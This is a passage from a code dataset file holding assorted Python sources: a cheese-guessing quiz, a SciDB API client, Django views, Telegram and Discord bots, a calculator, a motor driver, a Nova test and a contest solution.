een soort kaas in gedachte, en ik zal jouw kaas proberen te raden!\")\nprint(\"Hier komt de eerste vraag..\")\n\n\nantwoord1 = input(\"Is de kaas geel? 
\")\nif antwoord1 == \"ja\": \n antwoord_a2 : input(\"zitten er gaten in? \")\nelse: antwoord_c2 = input(\"Zitten er blauwe schimmels op?\")\n\nif antwoord_a2 == \"ja\":\n antwoord_a3 : input(\"Is de kaas belachelijk duur? \")\nelse: antwoord_a2 = input(\"Is de kaas zo hard als steen? \")\n\nif antwoord_a3 == \"ja\":\n antwoord_a4 : input(\"Jouw kaas is een Emmenthaler!\")\nif antwoord_a2 == \"ja\":\n antwoord_b4 : input(\"Jouw kaas is een Parmigiano Reggiano!\")\nelse: antwoord_b5 = input(\"Jouw kaas is een Goudse kaas!\")\n\n","sub_path":"wieishet.py","file_name":"wieishet.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"281426538","text":"\"\"\"\n\nExample script for interacting with scidb.\n\n\"\"\"\"\"\n\nimport json\nimport requests\nimport urllib3\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nusername = '' # we will give you this on the hackathon day\npassword = '' # we will give you this on the hackathon day\nurl = 'https://ugm.scibite.com/api/tie/v1/'\n\n\ndef get_all_datasets(from_type=None, to_type=None):\n \"\"\"\n Return a list of all the data sets captured in SciDB, and optionally limit.\n No parameter call returns all available data sets\n\n :param from_type: type of entity link from e.g. 'DRUG'\n :param to_type: type of entity link to e.g. 'GENE'\n :return:\n \"\"\"\n\n request_url = '{}/retrieve/datasets'.format(url)\n datasets = json.loads(requests.get(request_url, verify=False, auth=(username, password)).text)['hits']\n\n pruned_datasets = []\n\n if from_type or to_type:\n for dataset in datasets:\n try:\n entTypes = [dataset['toType'], dataset['fromType']]\n except KeyError:\n continue\n keep = True\n if from_type:\n if not from_type == entTypes[1]:\n keep = False\n if to_type:\n if not to_type == entTypes[0]:\n keep = False\n if keep:\n pruned_datasets.append(dataset)\n return pruned_datasets\n\n return datasets\n\n\ndef get_linked_entities(entity_type, entity_id, to_type=None, dataset_name=None):\n \"\"\"\n Optionally specify the type of link you are interested in (i.e. the entity\n type that you want to link to). DRUG, GENE, INDICATION, etc.\n\n :param entity_type: string entity type e.g. 'DRUG'\n :param entity_id: string entity ID e.g. 'CHEMBL192'\n :param to_type: set of Strings of entity to link to e.g. ['INDICATION', 'DRUG']\n :param dataset_name: name of the dataset that you wish to limit your associations too e.g. 
'Drug drug interactions extracted from drug labels'\n :return:\n \"\"\"\n\n datasets = get_all_datasets()\n\n all_links = []\n for dataset in datasets:\n if dataset_name and dataset['datasetName'] == dataset_name or dataset_name is None:\n try:\n entTypes = [dataset['toType'], dataset['fromType']]\n except KeyError:\n continue\n\n if entity_type == entTypes[0]:\n rel = 'to'\n elif entity_type == entTypes[1]:\n rel = 'from'\n else:\n continue\n\n if to_type:\n if to_type not in entTypes:\n continue\n\n if to_type:\n rel2 = 'toType' if rel == 'from' else 'fromType'\n\n payload = {'dataset': dataset['datasetName'],\n 'q': '{0}:{1}${2}{3}'.format(rel, entity_type, entity_id,\n ' and %s:%s' % (rel2, to_type) if to_type else '')}\n\n request_url = '{}/search/concept'.format(url)\n results = json.loads(requests.get(request_url,\n params=payload,\n verify=False,\n auth=(username, password)).text)\n for link in results['hits']:\n links = {'from': link['from'], 'fromName': link['fromName'], 'to': link['to'], 'toName': link['toName'],\n 'dataset': dataset['datasetName']}\n all_links.append(links)\n\n return all_links\n\n\nprint(get_all_datasets(from_type='DRUG'))\nprint(get_linked_entities('DRUG', 'CHEMBL192', dataset_name='Drug drug interactions extracted from drug labels'))\n","sub_path":"scidb_call.py","file_name":"scidb_call.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"423375168","text":"# -*- coding: utf-8 -*-\nfrom django.http import HttpResponseRedirect, HttpResponse, HttpResponseNotFound\nfrom django.shortcuts import render, render_to_response, get_object_or_404\nfrom django.template.context import RequestContext\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\nfrom django.conf import settings\n\nfrom main.models import Slider, News, Category, Product, ProductImages, Expertise\n\ndef home(request):\n\t#items = Slider.objects.all()\n\t\n\tcategories = Category.objects.all()\n\tctx = {'cat_items':categories}\n\treturn render_to_response('home.html', ctx, context_instance=RequestContext(request))\n\ndef categories(request):\n\tcategories = Category.objects.all()\n\tctx = {'cat_items':categories}\n\treturn render_to_response('categories.html', ctx, context_instance=RequestContext(request))\n\ndef news_view(request):\n\t#items = Slider.objects.all()\n\tnews = News.objects.all()\n\t#categories = Category.objects.all()\n\t\n\tctx = {'news':news,}\n\treturn render_to_response('news.html', ctx, context_instance=RequestContext(request))\n\ndef news_more(request, slug):\n\t#items = Slider.objects.all()\n\t#categories = Category.objects.all()\n\tnews = get_object_or_404(News, slug=slug)\n\t#breadcrumbs = [{'title':'Home', 'url': '/'}, {'title':'News', 'url':'news/'}, {'title':news.title, 'url':'news/'+news.slug}]\n\treturn render_to_response(\"news_more.html\", {'news':news,}, context_instance=RequestContext(request))\n\ndef expertise(request):\n\texpertises = Expertise.objects.all()\n\tctx = {'expertises':expertises,}\n\treturn render_to_response(\"expertise.html\", ctx, context_instance=RequestContext(request))\n\n\ndef expertise_more(request, slug):\n\texpertise = get_object_or_404(Expertise, slug=slug)\n\treturn render_to_response(\"expertise_more.html\", {'expertise':expertise,}, context_instance=RequestContext(request))\n\ndef category(request, slug):\n\t#items = Slider.objects.all()\n\t#categories = Category.objects.all() # for menu items\n\tcategory = 
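Both helpers above parse responses via json.loads(requests.get(...).text) and never check the HTTP status. requests covers both concerns: .json() decodes the body and raise_for_status() surfaces 4xx/5xx early; a sketch against the same endpoint shape (url and credential names reused from this record):

```python
import requests

def get_datasets(url, username, password):
    resp = requests.get('{}/retrieve/datasets'.format(url),
                        auth=(username, password), verify=False, timeout=30)
    resp.raise_for_status()        # turn HTTP errors into exceptions early
    return resp.json()['hits']     # .json() replaces json.loads(resp.text)
```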
get_object_or_404(Category, slug=slug)\n\tproducts = Product.objects.filter(category=category)\n\tpaginator = Paginator(products, settings.PRODUCTS_ON_PAGE) # Show 25 contacts per page\n\tpage = request.GET.get('page')\n\ttry:\n\t\tproducts = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tproducts = paginator.page(1)\n\texcept EmptyPage:\n\t\tproducts = paginator.page(paginator.num_pages)\n\tctx = {'category':category, 'products':products}\n\treturn render_to_response(\"category.html\", ctx, context_instance=RequestContext(request))\n\ndef product(request, slug, title):\n\t#items = Slider.objects.all()\n\t#categories = Category.objects.all() # for menu items\n\n\tcategory = get_object_or_404(Category, slug=slug)\n\tproduct = get_object_or_404(Product, slug=title)\n\tproduct_images = ProductImages.objects.filter(product=product)\n\tctx = {'category':category, 'product':product, 'product_images':product_images,}\n\t# ctx.update(breadcrumbs)\n\treturn render_to_response(\"product.html\", ctx, context_instance=RequestContext(request))\n\n\n\n\n\ndef langredirect(request, lang_code):\n\timport re\n\t\"\"\" \n\tPatched for Get method \n\t\"\"\" \n\t# get lang from url\n\tlang_code = re.split('/lang\\/|\\/', request.path)\n\tlang_code = lang_code[1]\n\tredirect = request.GET.get('next', '')\n\tresponse = HttpResponseRedirect(redirect) \n\tif lang_code : \n\t\tif hasattr(request, 'session'): \n\t\t\trequest.session['django_language'] = lang_code \n\t\telse: \n\t\t\tresponse.set_cookie(settings.LANGUAGE_COOKIE_NAME, lang_code) \n\t\treturn response","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"94526182","text":"from django.shortcuts import render\nfrom django.shortcuts import get_object_or_404\nfrom django.db.models import Q\nfrom django.core.paginator import Paginator\nfrom .models import *\n\n# Create your views here.\n\ndef home(request):\n queryset = request.GET.get(\"search\")\n posts = Post.objects.filter(state=True)\n if queryset:\n posts = Post.objects.filter(\n Q(title__icontains = queryset)|\n Q(description__icontains = queryset)\n ).distinct()\n\n paginator = Paginator(posts,2)\n page = request.GET.get('page')\n posts = paginator.get_page(page)\n\n context = {\n 'title':'Home',\n 'image':'img/home-bg.jpg',\n 'posts':posts\n }\n\n return render(request, 'index.html', context)\n\ndef programming(request):\n posts = Post.objects.filter(\n state=True,\n category = Category.objects.get(name='Programming')\n )\n context = {\n 'title':'Home',\n 'image':'img/programming.jpg',\n 'posts':posts\n }\n return render(request, 'programming.html', context)\n\ndef articles(request):\n posts = Post.objects.filter(\n state=True,\n category = Category.objects.get(name__iexact='Articles')\n )\n context = {\n 'title':'Home',\n 'image':'img/articles.jpg',\n 'posts':posts\n }\n return render(request, 'articles.html', context)\n\ndef tutorials(request):\n return render(request, 'tutorials.html', {'title':'Tutorials', 'image':'img/tutorials.jpg'})\n\ndef contents(request):\n posts = Post.objects.filter(\n state=True,\n category = Category.objects.get(name__iexact='Contents')\n )\n context = {\n 'title':'Contents',\n 'image':'img/contents.jpg',\n 'posts':posts\n }\n return render(request, 'contents.html', context)\n\ndef detallePost(request,slug):\n post = get_object_or_404(Post,slug=slug)\n context = {\n 'title': post.title,\n 'image': post.image,\n 'post': 
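The category view above wraps paginator.page() in PageNotAnInteger/EmptyPage handlers. Since Django 2.0, Paginator.get_page bundles exactly that fallback (first page on bad input, last page on overflow), and it is what the blog app later in this dump already calls; the three-branch try/except collapses to:

```python
from django.core.paginator import Paginator

def paged(queryset, page, per_page):
    # get_page() falls back to page 1 on a non-integer and to the last
    # page when the requested page is out of range
    return Paginator(queryset, per_page).get_page(page)
```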
post\n }\n return render(request, 'post.html', context)\n\ndef contact(request):\n return render(request, 'contact.html', {'title':'Contact', 'image':'img/contact.jpg'})\n","sub_path":"blog/apps/portal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"531673374","text":"# -*- coding: utf-8 -*-\nimport random\n\nfrom hashcode20.helpers import Input, Output\nimport numpy as np\n\ndef main(i: Input) -> Output:\n \"\"\"shortest signing time and higher shipping book rate and highest average book score\"\"\"\n\n book_scores_per_library = {\n library.library_id: list(map(lambda book_id: i.scores[book_id], library.books))\n for library in i.libraries\n }\n\n libraries_sorted = sorted(i.libraries, key=lambda library:\n (library.nb_signup_days, -library.ship_book_rate, np.mean(book_scores_per_library[library.library_id])))\n library_order = list(map(lambda l: l.library_id, libraries_sorted))\n book_order_per_library = [list(l.books) for l in libraries_sorted]\n return Output(library_order, book_order_per_library)\n\n","sub_path":"hashcode20/sol/sst_hsr_highest_average_book_score.py","file_name":"sst_hsr_highest_average_book_score.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"46736899","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom telegram.ext.dispatcher import run_async\nfrom telegram.ext import CommandHandler\nfrom telegram import ChatAction\nfrom pybooru import Pybooru\nfrom random import randint\nimport requests\nimport datetime\nimport yaml\n\n\ndef handler(dp):\n dp.add_handler(CommandHandler(\"a\", anime, pass_args=True))\n\nwith open(\"config.yml\", \"r\") as f:\n path = yaml.load(f)[\"path\"][\"anime\"]\n\n\ndef get_anime(update, query):\n update.message.chat.send_action(ChatAction.UPLOAD_PHOTO)\n client = Pybooru(\"yandere\")\n max_posts_to_load = 200\n posts = client.posts_list(query, max_posts_to_load)\n post_count = len(posts)\n random = randint(0, post_count - 1)\n image_post = \"https://yande.re/post/show/\" + str(posts[random][\"id\"])\n image_url = posts[random][\"sample_url\"]\n dl = requests.get(image_url)\n with open(path + \"anime_temp.jpg\", \"wb\") as f:\n f.write(dl.content)\n return image_post\n\n\n@run_async\ndef anime(bot, update, args):\n if args == []:\n input_query = \"rating:s\"\n else:\n input_query = \" \".join(args).lower()\n try:\n cap = get_anime(update, input_query)\n with open(path + \"anime_temp.jpg\", \"rb\") as f:\n update.message.reply_photo(f, caption=cap)\n print (datetime.datetime.now(),\n \">>> Sent anime:\", input_query, \">>>\",\n update.message.from_user.username)\n except:\n cap = get_anime(update, \"rating:s\")\n with open(path + \"anime_temp.jpg\", \"rb\") as f:\n update.message.reply_photo(f, caption=\"Nothing found, onii-chan, but here's one random pic:\\n\" + cap)\n print (datetime.datetime.now(),\n \">>> Tag not found:\", input_query, \", sent random\", \">>>\",\n update.message.from_user.username)\n","sub_path":"modules/anime.py","file_name":"anime.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"633486250","text":"import math, argparse, numpy, decimal\nfrom fractions import Fraction\n\n\nclass Calculator():\n def __init__(self):\n self.memory = 0\n self.pi = 
math.pi\n    def getfraction(self, number):\n        # parameter renamed from 'decimal' to avoid shadowing the imported decimal module\n        return number.as_integer_ratio()\n    def getcrossproduct(self, vector1, vector2):\n        return numpy.cross(vector1, vector2)\n    def getdotproduct(self, vector1, vector2):\n        return numpy.dot(vector1, vector2)\n    def getangle(self, angle):\n        if \"rad\" in str(angle):\n            print(\"Angle : {} is {} deg or {} deg rectified\".format(angle, self.radtodeg(angle), self.rectifyangle(angle)))\n        elif \"deg\" in str(angle):\n            print(\"Angle : {} is {} rad or {} rad rectified\".format(angle, self.degtorad(angle),self.rectifyangle(angle)))\n        else:\n            print(\"Specify rad or deg\")\n    def degtorad(self, angle):\n        return(2*self.pi*self.extractfloat(angle)/360)\n    def radtodeg(self, angle):\n        return(360*self.extractfloat(angle)/(self.pi*2))\n    def rectifyangle(self, angle):\n        if \"deg\" in angle:\n            rect_angle = self.degtorad(angle)\n            while rect_angle > 2*self.pi:\n                rect_angle-= 2*self.pi\n        elif \"rad\" in angle:\n            rect_angle = self.radtodeg(angle)\n            while rect_angle > 360:\n                rect_angle -= 360\n        return rect_angle\n\n    def extractfloat(self, angle):\n        newstr = ''.join((ch if ch in '0123456789.-' else ' ') for ch in angle)\n        rect_angle = [float(i) for i in newstr.split()]\n        if \"pi/\" in str(angle) or \"pi /\" in str(angle):\n            return self.pi/rect_angle[0]\n        elif \"/pi\" in str(angle) or \"/ pi\" in str(angle):\n            return rect_angle[0]/self.pi\n        elif \"pi\" in str(angle):\n            return rect_angle[0]*self.pi\n        else:\n            return rect_angle[0]\n    def getzeros(self, a, b, c):\n        radical = b**2-4*a*c\n        denum = 2*a\n        reel = -b/denum\n        if radical >= 0:\n            print(\"Zeros are : {} and {}\".format((-b+math.sqrt(radical))/denum, (-b-math.sqrt(radical))/denum))\n        elif radical < 0 and len(str(math.sqrt(abs(radical))).split('.')[1]) <= 1:\n            # imaginary part is sqrt(|discriminant|)/(2a), not |discriminant|/(2a)\n            print(\"Zeros are complex and are : {} + {} i and {} - {} i\".format(reel, math.sqrt(abs(radical))/denum, reel, math.sqrt(abs(radical))/denum))\n        else:\n            print(\"Zeros are complex and are : {} + √{}/{} i and {} - √{}/{} i\".format(reel, abs(radical), denum, reel, abs(radical), denum))\n\n    def a_parmi_b(self, a, b):\n        return math.factorial(b)/(math.factorial(a)*(math.factorial(b-a)))\n\n\ndef parseall():\n    parser = argparse.ArgumentParser(description=\"Calculator\")\n    parser.add_argument(\"-a\", \"--angle\", metavar=\"Float\",default=None, dest='angle', help=\"The angle to convert; the unit (deg or rad) must be given after the value\")\n    parser.add_argument(\"-v1\", \"--vector1\", metavar=\"Vector\", default=None,type=float, dest='vector1',nargs='+', help=\"Components of the first vector\")\n    parser.add_argument(\"-v2\", \"--vector2\", metavar=\"Vector\", default=None,type=float, dest='vector2',nargs='+', help=\"Components of the second vector\")\n    parser.add_argument(\"-dp\", \"--dotproduct\",default=False, action='store_true', dest='dproduct', help='Computes the dot product; takes vectors as input')\n    parser.add_argument(\"-cp\", \"--crossproduct\",default=False,action='store_true', dest='cproduct', help='Computes the cross product; takes vectors as input')\n    parser.add_argument(\"-q\", \"--quadratic\",metavar = \"Float\", nargs='+',default=None, dest='quad',type=float,help=\"Computes the zeros of a quadratic function\")\n    parser.add_argument(\"-f\", \"--fraction\",metavar=\"Float\", default=None, dest='fraction', type=float, help=\"Computes the fraction associated with a decimal number\")\n    parser.add_argument(\"-ab\", \"--abyb\", metavar=\"Int\", default=None,type=int, dest='abyb',nargs='+', help=\"Computes a choose b\")\n    return parser.parse_args()\n\ndef main():\n    ARGS = 
parseall()\n    calc = Calculator()\n    if ARGS.angle is not None:\n        calc.getangle(ARGS.angle)\n    elif ARGS.quad is not None:\n        calc.getzeros(ARGS.quad[0], ARGS.quad[1], ARGS.quad[2])\n    elif ARGS.fraction is not None:\n        print(calc.getfraction(ARGS.fraction))\n    elif ARGS.dproduct is True and ARGS.vector1 is not None and ARGS.vector2 is not None:\n        print(\"Dot product between vector {} and vector {} is {}\".format(ARGS.vector1, ARGS.vector2, calc.getdotproduct(ARGS.vector1, ARGS.vector2)))\n    elif ARGS.cproduct is True and ARGS.vector1 is not None and ARGS.vector2 is not None:\n        print(\"Cross product between vector {} and vector {} is {}\".format(ARGS.vector1, ARGS.vector2, calc.getcrossproduct(ARGS.vector1, ARGS.vector2)))\n    elif ARGS.abyb is not None:\n        print(calc.a_parmi_b(ARGS.abyb[0], ARGS.abyb[1]))\n\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"42945052","text":"from __future__ import annotations\n\nfrom base.struct import Config\n\nfrom bs4 import BeautifulSoup\nfrom discord_components import DiscordComponents\n\nfrom discord.ext import commands, tasks\nimport discord, json, logging, aiohttp\n\nlogging.basicConfig(level=logging.INFO)\n\nintents = discord.Intents().all()\n\nclass Bot(commands.Bot):\n    def __init__(self):\n        \n        super().__init__(\n            intents=intents,\n            command_prefix=commands.when_mentioned_or('s.'),\n            description='Bot de nível da Kiniga Brasil.',\n            activity=discord.Streaming(name=\"https://kiniga.com/\", url='https://kiniga.com/')\n        )\n        DiscordComponents(self)\n        self.remove_command('help')\n        self.feed.start()\n        \n\n        with open('config.json', 'r', encoding='utf-8') as f:\n            self.cfg = Config(json.loads(f.read()))\n\n        self.cog_list = ['cogs.ajuda', 'cogs.loja', 'cogs.mod', 'cogs.perfil', 'cogs.user']\n        for cog in self.cog_list:\n            try:\n                self.load_extension(cog)\n            except Exception as e:\n                print(f'Error occurred while cog \"{cog}\" was loaded.\\n{e}')\n        \n\n    def cog_unload(self):\n        # tasks.Loop has no close() method; cancel() stops the background loop\n        self.feed.cancel()\n        return \n    \n    def startup(self):\n        self.run(self.cfg.bot_token)\n    \n    @tasks.loop(minutes = 5)\n    async def feed(self):\n        async with aiohttp.ClientSession() as session:\n            async with session.get(\"http://kiniga.com/\") as resp:\n                soup = BeautifulSoup(await resp.text(), 'lxml')\n                table = soup.find('table', attrs={'class':'manga-chapters-listing'})\n                titles = table.find('td', attrs={'class':'title'})\n                for t in titles:\n                    try:\n                        links = table.find_all('td', attrs={'class':'release'})[0]\n                        for l in links.find_all('a', href=True):\n                            try:\n                                emoji = self.get_emoji(id=785300070857572372)\n                                channel = discord.utils.get(self.get_all_channels(), \n                                guild__name=self.cfg.guild, \n                                id=self.cfg.chat_cmds)\n                                messages = await channel.history(limit=1).flatten()\n                                messages.reverse()\n                                cont = '{} | Saiu o **{}** de **{}**!\\n{}'.format(emoji, l.get_text(),\n                                t.get_text(),\n                                l['href'])\n                                member = channel.guild.get_member(741770490598653993)\n                                webhooks = await channel.webhooks()\n                                webhook = discord.utils.get(webhooks, name = \"Capitulos Recentes\")\n                                \n                                if webhook is None:\n                                    webhook = await channel.create_webhook(name = \"Capitulos Recentes\")\n                                \n                                for i, message in enumerate(messages):\n                                    message = message.content\n                                    if message == cont:\n                                        pass\n                                    else:\n                                        await webhook.send(cont, username = member.name, avatar_url = member.avatar_url)\n                            except Exception as e: raise e\n                        else: pass\n                    except Exception as e: raise e\n
                else: pass\n    \n    @feed.before_loop # wait for the bot before starting the task\n    async def before_send(self):\n        print('Iniciando...')\n        await self.wait_until_ready()\n        return\n\n\nif __name__ == '__main__':\n    Bot().startup()","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"585128659","text":"#!/usr/bin/env python3\nimport RPi.GPIO as GPIO\nimport sys\nimport time\n\nclass MotorDriver:\n    freq = 100\n    duty = 100\n\n    def __init__(self,pin1,pin2,pin3):\n        GPIO.setmode(GPIO.BCM)\n        self.channels = [pin1,pin2,pin3]\n        GPIO.setup(self.channels,GPIO.OUT)\n        self.pwmf = GPIO.PWM(self.channels[0],self.freq) \n        self.pwmb = GPIO.PWM(self.channels[1],self.freq)\n        self.pwml = GPIO.PWM(self.channels[2],self.freq)\n        self.pwmf.start(0)\n        self.pwmb.start(0)\n        self.pwml.start(0)\n    \n    def __setting(self):\n        self.pwmf.ChangeDutyCycle(0)\n        self.pwmb.ChangeDutyCycle(0)\n        self.pwml.ChangeDutyCycle(0)\n        time.sleep(0.0001)\n    \n    def goForward(self,duty=60):\n        self.__setting()\n        self.pwmf.ChangeDutyCycle(duty)\n    \n    def goBackward(self,duty=60):\n        self.__setting()\n        self.pwmb.ChangeDutyCycle(duty)\n    \n    def turbo(self):\n        self.__setting()\n        self.pwmf.ChangeDutyCycle(100)\n        time.sleep(1)\n        self.goForward()\n\n    def breaking(self):\n        self.__setting()\n        self.pwmf.ChangeDutyCycle(100)\n        self.pwmb.ChangeDutyCycle(100)\n        self.pwml.ChangeDutyCycle(100)\n\n    def stop(self):\n        self.__setting()\n    \n    def clean(self):\n        GPIO.cleanup(self.channels)\n\nclass MotorDriverwithCSC(MotorDriver):\n    def gowithCSC(self,duty,cadence):\n        if duty == 0:\n            if cadence > 100:\n                cadence = 100\n            self.goBackward(cadence)\n        else:\n            self.goForward(duty)\n    \n'''\ndef test():\n    try:\n        motor= MotorDriver(19,26,13)\n        motor.goForward()\n        time.sleep(10)\n        print(\"goBackward\")\n        motor.goBackward()\n        time.sleep(10)\n        print(\"stop\")\n        motor.stop()\n        time.sleep(3)\n        print(\"breaking\")\n        motor.breaking()\n        time.sleep(3)\n    except KeyboardInterrupt:\n        pass\n    finally: \n        motor.clean()\n        print(\"end\")\n\nif __name__ == '__main__':\n    test()\n'''\n","sub_path":"carpc/Parts/MotorDriver.py","file_name":"MotorDriver.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"35126075","text":"from django.contrib import admin\nfrom django.urls import path\nfrom capacityWeb import views\n\napp_name = '[capacityWeb]'\nurlpatterns = [\n    # Home page\n    path('index/', views.index, name='index'),\n    # Detail pages for each scenic area\n    path('meifeng/', views.meifeng, name='meifeng'),\n    path('huangshanjian/', views.huangshanjian, name='huangshanjian'),\n    path('tianchi/', views.tianchi, name='tianchi'),\n    path('yueguang/', views.yueguang, name='yueguang'),\n    path('longshan/', views.longshan, name='longshan'),\n    path('yule/', views.yule, name='yule'),\n    path('guihua/', views.guihua, name='guihua'),\n    path('mishan/', views.mishan, name='mishan'),\n    path('updatetodayTouristNums/', views.updatetodayTouristNums),\n    path('updatetodayTouristNums2/', views.updatetodayTouristNums2),\n    path('getScenicHeartMapData/', views.getScenicHeartMapData),\n    # Early-warning analysis\n    path('mfanalysis/', views.mf_analysis, name='mfanalysis'),\n    path('msanalysis/', views.ms_analysis, name='msanalysis'),\n    path('tcanalysis/', views.tc_analysis, name='tcanalysis'),\n    path('lsanalysis/', views.ls_analysis, name='lsanalysis'),\n    path('ghanalysis/', views.gh_analysis, name='ghanalysis'),\n    path('yganalysis/', views.yg_analysis, 
name='yganalysis'),\n    path('ylanalysis/', views.yl_analysis, name='ylanalysis'),\n    path('hsanalysis/', views.hs_analysis, name='hsanalysis'),\n    # Backend administration\n    path('admin/', views.admin, name='admin'),\n    path('getAdminData/', views.getAdminData),\n    path('deleteAdminData/', views.deleteAdminData),\n    path('addAdminData/', views.addAdminData),\n    path('getAdminerData/', views.getAdminerData),\n    path('deleteAdminerData/', views.deleteAdminerData),\n    path('addAdminerData/', views.addAdminerData),\n    # Early-warning management\n    path('admin_warn/', views.admin_warn, name='admin_warn'),\n    path('getWarnData/', views.getWarnData),\n    path('DetectWarn/', views.DetectWarn),\n    path('notice/', views.notice),\n    path('deleteWarnData/', views.deleteWarnData),\n    path('addWarnData/', views.addWarnData),\n    # Log out\n    path('logout/', views.logout, name='logout')\n]\n","sub_path":"capacityWeb/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"105271900","text":"#\n# Copyright (c) 2015, Platform9 Systems\n# All Rights Reserved\n#\n\nfrom nova.tests.unit.api.openstack import fakes\n\nfrom nova import compute\nfrom nova import network\nfrom nova import test\nfrom nova.api.openstack.compute import virtual_interfaces\nfrom nova.api.openstack.compute import pf9_virtual_interfaces\nfrom nova.objects import virtual_interface as vif_obj\nfrom nova.tests.unit import policy_fixture\n\nFAKE_UUID = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'\nVIFS = [{'uuid': '00000000-0000-0000-0000-00000000000000000',\n         'address': '00-00-00-00-00-00',\n         'instance_uuid': '00-00-00-00-00-00',\n         'network_id': '123'},\n        {'uuid': '11111111-1111-1111-1111-11111111111111111',\n         'address': '11-11-11-11-11-11',\n         'instance_uuid': '11-11-11-11-11-11',\n         'network_id': '456'}]\n\n\ndef compute_api_get(self, context, instance_id, expected_attrs=None,\n                    want_objects=False):\n    return dict(uuid=FAKE_UUID, id=instance_id, instance_type_id=1, host='bob')\n\ndef _generate_fake_vifs():\n    global VIFS\n    fake_vifs = []\n    for i in range(0, len(VIFS)):\n        vif = vif_obj.VirtualInterface()\n        vif.uuid = VIFS[i]['uuid']\n        vif.address = VIFS[i]['address']\n        vif.network_id = VIFS[i]['network_id']\n        fake_vifs.append(vif)\n    return fake_vifs\n\n\ndef get_vifs_by_instance(self, context, instance_id):\n    return _generate_fake_vifs()\n\n\ndef delete_vif(self, context, instance_uuid, vif_id):\n    global VIFS\n\n    for i in range(0, len(VIFS)):\n        if VIFS[i]['uuid'] == vif_id:\n            del VIFS[i]\n            return\n\nclass FakeRequest(object):\n    def __init__(self, context):\n        self.environ = {'nova.context': context.get_admin_context()}\n\nclass ServerVirtualInterfacePF9Test(test.NoDBTestCase):\n\n    def setUp(self):\n        super(ServerVirtualInterfacePF9Test, self).setUp()\n        self.stubs.Set(compute.api.API, \"get\",\n                       compute_api_get)\n        self.stubs.Set(network.api.API, \"get_vifs_by_instance\",\n                       get_vifs_by_instance)\n        self.stubs.Set(network.api.API, \"delete_vif_for_instance_pf9\",\n                       delete_vif)\n        self.vif_controller = pf9_virtual_interfaces.VirtualInterfacePf9Controller()\n        self.os_vif_controller = virtual_interfaces.ServerVirtualInterfaceController()\n        self.policy = self.useFixture(policy_fixture.RealPolicyFixture())\n\n    def test_virtual_interfaces_delete(self):\n        url = '/v2/fake/servers/abcd/action'\n        body = {'removeVif': '11111111-1111-1111-1111-11111111111111111'}\n        req = fakes.HTTPRequest.blank(url, use_admin_context=True)\n        self.vif_controller._removeVif(req, FAKE_UUID, body)\n\n        req = 
fakes.HTTPRequest.blank('/v2/fake/servers/abcd/os-virtual-interfaces')\n resp = self.os_vif_controller.index(req, 'abcd')\n self.assertIsNotNone(resp, 'NULL response from os-virtual-interfaces')\n data = resp['virtual_interfaces']\n self.assertEqual(len(data), 1, 'Incorrect interfaces : %s' % data)\n\n","sub_path":"tests/unit/api/openstack/compute/test_virtual_interfaces_pf9.py","file_name":"test_virtual_interfaces_pf9.py","file_ext":"py","file_size_in_byte":3078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"527352787","text":"# included from snippets/main.py\ndef debug(*x, msg=\"\"):\n import sys\n print(msg, *x, file=sys.stderr)\n\n\ndef solve(SOLVE_PARAMS):\n pass\n\n\ndef main():\n N, K = map(int, input().split())\n for _i in range(K):\n s = str(N)\n g1 = int(\"\".join(sorted(s, reverse=True)))\n g2 = int(\"\".join(sorted(s)))\n N = g1 - g2\n\n print(N)\n\n\n# tests\nT1 = \"\"\"\n314 2\n\"\"\"\nTEST_T1 = \"\"\"\n>>> as_input(T1)\n>>> main()\n693\n\"\"\"\nT2 = \"\"\"\n1000000000 100\n\"\"\"\nTEST_T2 = \"\"\"\n>>> as_input(T2)\n>>> main()\n0\n\"\"\"\nT3 = \"\"\"\n6174 100000\n\"\"\"\nTEST_T3 = \"\"\"\n>>> as_input(T3)\n>>> main()\n6174\n\"\"\"\n\n\ndef _test():\n import doctest\n doctest.testmod()\n g = globals()\n for k in sorted(g):\n if k.startswith(\"TEST_\"):\n print(k)\n doctest.run_docstring_examples(g[k], g, name=k)\n\n\ndef as_input(s):\n \"use in test, use given string as input file\"\n import io\n f = io.StringIO(s.strip())\n g = globals()\n g[\"input\"] = lambda: bytes(f.readline(), \"ascii\")\n g[\"read\"] = lambda: bytes(f.read(), \"ascii\")\n\n\nif __name__ == \"__main__\":\n import sys\n input = sys.stdin.buffer.readline\n read = sys.stdin.buffer.read\n sys.setrecursionlimit(10 ** 6)\n if sys.argv[-1] == \"-t\":\n print(\"testing\")\n _test()\n sys.exit()\n main()\n sys.exit()\n\n# end of 